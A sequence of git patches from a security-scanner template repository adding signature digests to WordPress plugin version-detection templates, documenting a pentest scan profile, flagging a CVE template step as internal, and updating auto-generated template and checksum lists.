490a004630440220080d1207fdd1d748393f45b6a85ba0b875e1ce0d643ff167cd687c324011a92d022012912b29e613fec0046187a22fd92a5c82a3545b56e3d7d605b1efb71434975a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..aa147cccce 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e544438791fe565b2d7a40ee1d130c31149f0ef732b259eef889b5a029e8f57702202c1dffe79ca89b31ce3ce690664295e33175340dbb86ffddd99aff67c0f83106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 7b28bf7020..3dff16d960 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205573415c5fb11b6ead6e5f5d7d48b3de102351e31135620c6d698eb2286b9865022062ac0cb76a1ae683796cd2d42709c9af38e8521796280bea8dc8c5ebad96e337:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index da6abc2a81..5c1963916a 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cb810f29d19a507c646fd83bb8779c915f344e4349abe1f2f2e4581f9bb489d7022049cd5954550083b7dfaba641c54ab4d5fa5e06665aec4826ebbed18a04b333b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..f4b8a278bf 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb65403ec39cb1fb99bb11f62c8d307d113fbdbe9bac9a48c54fc1047d5b0a6c02201d8714c10695f7caf35636fcf0eae4fc587b9d98217a5aa9f29dd5bc05803e28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..93942a58e9 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087843131111cb82d917abc587559105e9198058dbe90d0428842e9212357468c022100c0b062e8b98af079c22abbf4220d747df985c2eaa935e0cef98626ae6f61407d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..89dfb05677 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064d83b0c7b444554bc0b1f4c2d39429d199a30a6d998d8d99f7546640b995d5802204622ee11f10b4ee5ec97f4efc056b03f18888c39db49d170753ddf9d2397585d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..8957665fd4 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017d2de675d86c291260797b01931f229e4a835759d7c39b55bc2a4850740c5cb022100f53d0e85f4b22283a293de3ca4209d2e1f4d24a34dcb9bc9ffb028f6ff9b7c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..e68721040b 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022017fac232a6ef05c4c948816ca04bced34f2a66dceb86faf2c6ea8e84d7134b78022048500d0ea663a92fa38a63e719f53c6379f573d4efc4a5f5408269a764e0816b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..715c104555 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203ea73b145020e573adf0b4f2c7b7435b9391ada2c5ef91e719ddaf5207fbd0f2022100b148bfca14e8ebbe4f16856e54072fd68d473870000dcc39ca4f7093beb629bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..da139ad588 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220224be3502d1653c391ea9f247e7a77c9e9ec64034e4f18d8723dff9cae8c4e840220303d97f0ebff5a925d76d9d584578816bb445d9705030766d2f05985050cf15f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/minecraft-enum.yaml b/javascript/enumeration/minecraft-enum.yaml index ff8e422f28..f5f9f83aa4 100644 --- a/javascript/enumeration/minecraft-enum.yaml +++ b/javascript/enumeration/minecraft-enum.yaml @@ -48,3 +48,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a004730450220298b3f107f118db777907a4c1ae4ae7b4f145f9b0e616442fcc13058a48c11c5022100fb80447d42c349da17cad3edde3c0d5dcc3d0bb963c6c6e64780051ce306b780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fea633e8607373d1abf5aebdca963d56b3d220e5 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:13:15 +0530 Subject: [PATCH 0569/1841] Update pentest.yml --- profiles/pentest.yml | 33 +++++++++++++++++++++++++-------- 1 file changed, 25 insertions(+), 8 deletions(-) diff --git a/profiles/pentest.yml b/profiles/pentest.yml index 2546416b85..4dafb859cb 100644 --- a/profiles/pentest.yml +++ b/profiles/pentest.yml @@ -1,10 +1,27 @@ -# This is a configuration file for the pentest template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/pentest.yml -list target_list_to_scan.txt - +# Nuclei Configuration Profile for Penetration Testing +# +# This configuration file is specifically tailored for performing penetration testing using Nuclei. +# +# Purpose: +# This profile is focused on identifying security vulnerabilities across various protocols and services, including HTTP, TCP, JavaScript, DNS, and SSL. It excludes templates related to Denial of Service (DoS), fuzzing, and Open Source Intelligence (OSINT) to ensure focused and efficient penetration testing. +# +# Included Templates: +# This configuration references specific templates designed for penetration testing: +# - http: Templates for detecting vulnerabilities in HTTP-based services. +# - tcp: Templates for detecting vulnerabilities in TCP-based services. +# - javascript: Templates written using javasxript protocol for detecting vulnerabilities in applications. +# - dns: Templates for detecting vulnerabilities in DNS services. +# - ssl: Templates for detecting SSL/TLS related issues. +# +# Excluded Tags: +# This configuration excludes templates tagged with 'dos', 'fuzz', and 'osint' to avoid unnecessary and potentially disruptive tests: +# - dos: Templates for Denial of Service attacks. +# - fuzz: Templates for fuzzing. +# - osint: Templates for Open Source Intelligence gathering. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile pentest -u https://example.com type: - http @@ -16,4 +33,4 @@ type: exclude-tags: - dos - fuzz - - osint \ No newline at end of file + - osint From 63b01a5682ea46d9c7d9fa8356c87caf8316579a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 25 Jun 2024 13:14:59 +0530 Subject: [PATCH 0570/1841] added internal: true --- http/cves/2023/CVE-2023-3380.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml index e78e68b920..b0d6fbb189 100644 --- a/http/cves/2023/CVE-2023-3380.yaml +++ b/http/cves/2023/CVE-2023-3380.yaml @@ -37,6 +37,7 @@ http: - "images/WAVLINK-logo.png" - "Wi-Fi APP Login" condition: and + internal: true - raw: - | From f3a22506d15eeac326f8a7eca346accdefb0817f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 25 Jun 2024 07:45:49 +0000 Subject: [PATCH 0571/1841] Auto Generated New Template Addition List [Tue Jun 25 07:45:49 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 39b9ef9374..ad9a846eff 100644 --- a/.new-additions +++ b/.new-additions @@ -69,6 +69,7 @@ file/malware/hash/wildneutron-malware-hash.yaml http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml http/cves/2021/CVE-2021-43831.yaml +http/cves/2021/CVE-2021-4436.yaml http/cves/2023/CVE-2023-32068.yaml http/cves/2023/CVE-2023-37645.yaml http/cves/2023/CVE-2023-38194.yaml From 2b5166721351fd01a67eb7d064c4bae0cbff2d36 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 07:46:02 +0000 Subject: [PATCH 0572/1841] Auto Generated Templates Checksum [Tue Jun 25 07:46:02 UTC 2024] :robot: --- templates-checksum.txt | 409 +++++++++++++++++++++-------------------- 1 file changed, 205 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0d8b295b2f..d862a60def 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2444,6 +2444,7 @@ http/cves/2021/CVE-2021-44138.yaml:a802f5e3f53e4f8211dfd348b2ca5ddcb9304732 http/cves/2021/CVE-2021-44139.yaml:740e49a49ce3c88b450eabd43ae798ffcacf8a0e http/cves/2021/CVE-2021-44152.yaml:1930aeb138e46dbadc2969661cf98871caf3a9ac http/cves/2021/CVE-2021-44228.yaml:8874a4c3724b6c1c3ea43e62fbb9ecdca5d3772f +http/cves/2021/CVE-2021-4436.yaml:74ce19dfd388d2ab37902fbbf4e149d1bde2734f http/cves/2021/CVE-2021-44427.yaml:2c4dacfc13a61ca0565e786199ea8ddff21bf839 http/cves/2021/CVE-2021-44451.yaml:3c62b0760c7c5a67589eb5a97b8b058f1c5a534f http/cves/2021/CVE-2021-44515.yaml:e4737487534b10d29b6f7d59ce84d88792faa3a0 @@ -7185,227 +7186,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:7144512c253496afb47f75eddd28cfecc71f9678 +http/technologies/wordpress/plugins/add-to-any.yaml:07e7ea9fdbd8bf1a89e5c80f5510ec4ffb0c6b8d +http/technologies/wordpress/plugins/admin-menu-editor.yaml:b48651abeb751096d34e9d5e95005818054587e7 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:b75d7e725dfc8dd0c1c797880e6a994458f3511a +http/technologies/wordpress/plugins/akismet.yaml:d97426d0a7fcec8c7acc407ca285a09d896b7207 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:eb2d239e57dc3353581cc430cfc10498c1f4ad90 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:edf9d06299d702f2f2ffe2da8ed48bde284fcd12 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:75ede4456663f2f0ff025f9aa5979f5d69bacb58 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:44e8ed9cfd6fc89505cf6f8df9d746bf7069c7e3 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0aa0e3f6a23ae3d96ff769f8c8f1539321b3b862 +http/technologies/wordpress/plugins/amp.yaml:bbef72c35230bf24754e45def88e3058ea6ee47d +http/technologies/wordpress/plugins/antispam-bee.yaml:dc80ed149f8578439985b3ab3f901777940c978e +http/technologies/wordpress/plugins/astra-sites.yaml:d934a8e1e9c61d9a68ce709146461049ff988d60 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:03a36d4b749ffe5c9b2a6782397b3363cf878304 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:ba158b0c07f834036879b648d0ac509bea1a2bc3 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/autoptimize.yaml:0d80f0e77b007e838bafbdb9a49eeb2ce74f32fc +http/technologies/wordpress/plugins/backwpup.yaml:56232a8fedaa5ff94792672b608ba0a35157b9dc +http/technologies/wordpress/plugins/better-search-replace.yaml:ae272c2c26ab7cd7e4a6a954b3eb9560f826d214 +http/technologies/wordpress/plugins/better-wp-security.yaml:0f748e48134cd88f0aa1d97e041ab573e06564da +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:8c7160c74e30d5a295993f8cece6e54fe94363d1 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:7290b88fcb6d597bd8edf5d84ff17f03ff5e7c32 +http/technologies/wordpress/plugins/breeze.yaml:a99b5de08ae2af79bfd17d90bb99e5a92a51e35c +http/technologies/wordpress/plugins/broken-link-checker.yaml:0e3a04e3388c8c616c26bb54131d282ebd9e7ab4 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:cb0672c883af42c4b7018e6c030c4eb657e21acc +http/technologies/wordpress/plugins/classic-editor.yaml:050067c4f6c66fb1aa7bfcfb8c3de4bba0839e7d +http/technologies/wordpress/plugins/classic-widgets.yaml:fb9070af9ac63d4271f2211ad369e83b9a631e98 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:e1ede2f25691267c9e20c7a1a8241bd7ede597a6 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:dc2095558be073a2330fccfc86b78e385768ba6e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/copy-delete-posts.yaml:1c9bb377abbf336c9ab111f368f48d8f8ec3927c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:80ee9d72a05fa607b3bac8d43eaffdc294784889 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c5676cb3ffcf4cd88144a09e5d6acffcd2ce62f1 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:fdd2c32e4640843aacc4fce1d65a3175e32c988a -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13910c72122557903a40002d0f0dcd242980da26 +http/technologies/wordpress/plugins/cmb2.yaml:a7f33bcbdd54f96597e1bc71eb9676d22c655ebf +http/technologies/wordpress/plugins/coblocks.yaml:d10991be00aa549e3875b13ba41b232f3833820d +http/technologies/wordpress/plugins/code-snippets.yaml:cbe3e6723d4fd21a32d5874e7f5ae16548c96f06 +http/technologies/wordpress/plugins/coming-soon.yaml:86f62b325fe719ac8bda8b11d925a0e233029892 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:cb0b5a6265d7314946bd22507255d978b28fcb9e +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:645a0956741e001ed74c776b97cef598b483469e +http/technologies/wordpress/plugins/contact-form-7.yaml:d038a389414ad53651260dcebe6c68a03d9be173 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ce73fd62ad129b555167502d5a4589f2fb1bbb4a +http/technologies/wordpress/plugins/cookie-law-info.yaml:19222112ae07716117dbf10dc24a356e6fc02d23 +http/technologies/wordpress/plugins/cookie-notice.yaml:71967d0d5e857db161450d38e238ec145f54752b +http/technologies/wordpress/plugins/copy-delete-posts.yaml:73a548002cfc19a353400b2b97c5ec8dc1a0155c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:737d3754c3f20bbf045464e0e4dfebcf1d7a9002 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:f18bf33a997e46aa2524b82fe50ef294021f430e +http/technologies/wordpress/plugins/custom-css-js.yaml:7dd624cc65b8e4c0f91e8cfde6fc750ea17903da +http/technologies/wordpress/plugins/custom-fonts.yaml:ed94c48c31b9dd688e0d4d2a550c9137801950f8 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:b1fa18dc1f51264e1b75bb52ae3a431ff7c89067 +http/technologies/wordpress/plugins/disable-comments.yaml:3adc5bf97e8cfca6248a80f8871767ed47c307a9 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:b9c3da1b702544c6a880fd9f5f85265fcbb85345 +http/technologies/wordpress/plugins/duplicate-page.yaml:974a0b4ea7104db40fe733048c141e0b74cc4071 +http/technologies/wordpress/plugins/duplicate-post.yaml:dac4ce90f889b4cc1d1d0a4e91d5fcbb7397b3c9 +http/technologies/wordpress/plugins/duplicator.yaml:6ed03f5b2b30e83fa4a3d20667d8192e8fbf92e5 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:da47695b8724287e1a610c800dd659bae2dd40f8 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:c64112a2a3423112f22659daf2845f7394e57725 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:fcb6316047b3cb92d6a79b6b3cd0bc5ec7410d8f -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:3a6a408c680afed419fd5cff87843d842fb53175 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:2f93216319633715b88eadfeb45c0e4f0fc1a9e7 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:db9313e5c1ba6ee717bdcaf28ca5bf4aef6282f4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:61360e6f60107fd44221ceacbb4598c1c27a2b2d +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:976968c3877b6c53755875b2e8a7af056698e7f7 +http/technologies/wordpress/plugins/elementor.yaml:fac8837b7f4c3e212c496442869f559ad96499e8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e488dbee4e9ac653e5313b160f6b84a7869b9803 +http/technologies/wordpress/plugins/enable-media-replace.yaml:b73bd0a6732a20c3ddd7e753bebe53c401e03db2 +http/technologies/wordpress/plugins/envato-elements.yaml:75231eb5ae54102c701568a8d2c489c3af2bd558 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:f911b256e23d64db3ec4534fb35fe6184917298f +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:11e738bef19be4ef94475548200a2d0804aca628 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:acbc17bad67db4a276b365c2024fb0fe838d0fcd +http/technologies/wordpress/plugins/fast-indexing-api.yaml:ff1c79897656a8e71fe9f2b565a148a5c233ff8a +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:c41c57c828020f724a110efc154152516fe88e5b +http/technologies/wordpress/plugins/flamingo.yaml:d39e3f471d0cb075ca95fbbe298f46feaa90cb0a +http/technologies/wordpress/plugins/fluentform.yaml:5871c9d5450a4b76a927c3c78cbe626cc417f88e +http/technologies/wordpress/plugins/font-awesome.yaml:0ce5b4d8ce23fc7b2db320fd79d5a558091ad81f +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:c0495a7e91b03eefa9e00f14c6287ee8f8971706 +http/technologies/wordpress/plugins/formidable.yaml:2d09e9e15c586cd37bf8e2d6927a90c8a92b933f +http/technologies/wordpress/plugins/forminator.yaml:32dad1859d4947db037e01fd256b65dcd7598434 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:ad45a5332dd8c7cf07c0101df2a7a2cab8a9004a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:d04a78b740332a56d49540e80355d1531f100d5d +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8a2edf15240c177225237f75a519e109160f6952 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:c56c9432ab87a2a2d865d4a1bde191b118bde8bc +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d50919c980dca7478a0d331473d1fd63e561bbd1 +http/technologies/wordpress/plugins/google-site-kit.yaml:94bfb8106dd8211680c23b4ef225c4503a65811d +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:28e2ab58b72b338469aa8b7bd88990e431e5b869 +http/technologies/wordpress/plugins/gtranslate.yaml:1a5499e6ec80a3879d154b4b05de7fd46d52fe61 +http/technologies/wordpress/plugins/gutenberg.yaml:b28a3cd0946a7b720587f5e14a4e5b0238bad78f +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:e7453d7fd87a617fd1456c986433709dafd8d229 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/hostinger.yaml:5528d42fea5183ffda7073d1c116da79afb63cf3 